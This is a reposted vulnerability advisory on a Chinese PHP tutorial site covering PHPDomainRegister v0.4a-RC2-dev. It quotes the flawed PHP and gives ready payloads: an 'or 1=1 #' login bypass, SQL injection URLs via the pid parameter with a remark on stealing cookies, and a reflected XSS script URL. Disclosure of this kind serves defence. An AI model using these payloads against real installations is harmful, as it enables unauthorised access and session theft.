网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

PHPDomainRegister v0.4a-RC2-dev多个缺陷及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题:PHPDomainRegister v0.4a-RC2-dev = [SQL Auth][SQL Inject][XSS]作者:Or4nG.M4n下载地址:http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar致谢:+----------------------------......

标题:PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
作者:Or4nG.M4n
下载地址:http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar
致谢:
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+
 
                                       SQL Auth Bypass
缺陷位置: class_AjaxLogin.php line 73
 
  function is_login() { <<<<==== 1
        include ('../config.php'); <<<<==== 2
  if(isset($_POST['username']))  { <<<<==== 3
  $_SESSION['username']   = $_POST['username']; <<<<==== 4
         $password   = $_POST['password']; <<<<==== 5
         $strSQL     = <<<<==== 6
                     "SELECT
                                *
                        FROM
                                `".$_SQL_PREFIX . $USER_Table_Name."`
                        WHERE
                                `LOGIN_NAME` = '".$_SESSION['username']."'
                        AND
                                password = md5('".$password."');"; <<<<==== 7
 
            $result  = mysql_query ($strSQL); <<<<==== 8
            $row     = mysql_fetch_row($result); <<<<==== 9
            $exist   = count($row); <<<<==== 10
        if($exist >=2) { $this->jscript_location();  } <<<<==== 11
        
        [jscript_location]
        
          function jscript_location() { <<<<==== 12
            $this->set_session(); <<<<==== 13
        echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14
  
 
测试方法:
just login as = > admin ' or 1=1 #
 
                                      SQL injection
缺陷位置
admin/index.php line 212
 
$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql); <<<<==== 2
 
line 1079
 
        showPacket($pid); <<<<==== 3
                                  
缺陷代码
index.php line 617
 
    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
    $result = mysql_query($SQL); <<<<==== 2
测试方法:
http://www.2cto.com /index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie
 
 
                                     Cross Site Scrpting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论